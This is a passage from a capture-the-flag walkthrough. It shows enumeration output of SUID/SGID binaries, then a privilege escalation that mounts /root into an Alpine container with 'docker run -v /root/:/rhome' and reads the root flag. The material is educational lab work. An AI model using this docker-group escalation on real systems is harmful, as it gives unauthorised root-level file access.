-rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 35K Jun 20  2021 /usr/bin/fusermount3

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                          
-rwxr-sr-x 1 root shadow 38K Aug 26  2021 /usr/sbin/unix_chkpwd                                                                                                                                           
-rwxr-sr-x 1 root mail 23K Jan 25  2021 /usr/libexec/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 15K Aug  5 03:00 /usr/lib/xorg/Xorg.wrap
-rwxr-sr-x 1 root crontab 43K Feb 22  2021 /usr/bin/crontab
-rwxr-sr-x 1 root mail 23K Feb  4  2021 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 23K Jan 20  2022 /usr/bin/write.ul (Unknown SGID binary)
-rwxr-sr-x 1 root ssh 347K Jul  1 17:37 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jan 20  2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 79K Feb  7  2020 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Feb  7  2020 /usr/bin/expiry
[...]

There are many interesting things, which I have partly tried almost all (especially the suggested CVEs). I see the light at the end of the tunnel when I notice the text "runc was found in /usr/bin/runc, you may be able to escalate privileges with it". I investigate and do some research (runc exploit) which leads me to the following link:

GitHub - Frichetten/CVE-2019-5736-PoC: PoC for CVE-2019-5736
PoC for CVE-2019-5736. Contribute to Frichetten/CVE-2019-5736-PoC development by creating an account on GitHub.

Ok, interesting. Let's see what we have available in the BOX as docker images, if there is not even an image, we will not be able to do anything, since the BOX is not connected to the internet (unless somehow proxying the requests, but we are at a higher level, I do not think that a BOX categorized as "simple" should be solved with this type of attacks).

$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
alpine       latest    d7d3d98c851f   3 months ago   5.53MB

Fantastic. A very light alpine. So, the attack itself is this, start a docker-machine that mounts a path not reachable by the current user (such as /root/) and access it from inside the container that has instead been started as administrator (provided that this user has the privileges to do so, but I'll find out soon). I will mount the local path /root/ to the internal docker folder /rhome.

$ docker run -it -v /root/:/rhome alpine /bin/sh
/ # pwd
/
/ # ls -la
total 68
drwxr-xr-x    1 root     root          4096 Nov  1 22:10 .
drwxr-xr-x    1 root     root          4096 Nov  1 22:10 ..
-rwxr-xr-x    1 root     root             0 Nov  1 22:10 .dockerenv
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 bin
drwxr-xr-x    5 root     root           360 Nov  1 22:10 dev
drwxr-xr-x    1 root     root          4096 Nov  1 22:10 etc
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 home
drwxr-xr-x    7 root     root          4096 Jul 18 15:34 lib
drwxr-xr-x    5 root     root          4096 Jul 18 15:34 media
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 mnt
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 opt
dr-xr-xr-x  264 root     root             0 Nov  1 22:10 proc
drwx------    5 root     root          4096 Aug 10 10:00 rhome
drwx------    1 root     root          4096 Nov  1 22:10 root
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 run
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 sbin
drwxr-xr-x    2 root     root          4096 Jul 18 15:34 srv
dr-xr-xr-x   13 root     root             0 Nov  1 22:10 sys
drwxrwxrwt    2 root     root          4096 Jul 18 15:34 tmp
drwxr-xr-x    7 root     root          4096 Jul 18 15:34 usr
drwxr-xr-x   12 root     root          4096 Jul 18 15:34 var

Wow... it looks like it worked.

/ # ls -la rhome
total 32
drwx------    5 root     root          4096 Aug 10 10:00 .
drwxr-xr-x    1 root     root          4096 Nov  1 22:10 ..
lrwxrwxrwx    1 root     root             9 Jul 22 16:46 .bash_history -> /dev/null
-rw-r--r--    1 root     root           571 Apr 10  2021 .bashrc
drwx------    3 root     root          4096 Jul 22 16:40 .cache
drwx------    3 root     998           4096 Jul 22 18:32 .config
lrwxrwxrwx    1 root     root             9 Jul 23 10:17 .dbshell -> /dev/null
drwxr-xr-x    3 root     root          4096 Jul 22 16:47 .local
-rw-------    1 root     root             0 Jul 23 10:16 .mongorc.js
-rw-r--r--    1 root     root           161 Jul  9  2019 .profile
-rw-r-----    1 root     root            33 Nov  1 09:48 root.txt
/ # cat /rhome/root.txt
6******************************d
/ #

And here's our root flag. Once again, that's all, folks... see you at the next BOX and have fun hacking, but always legally.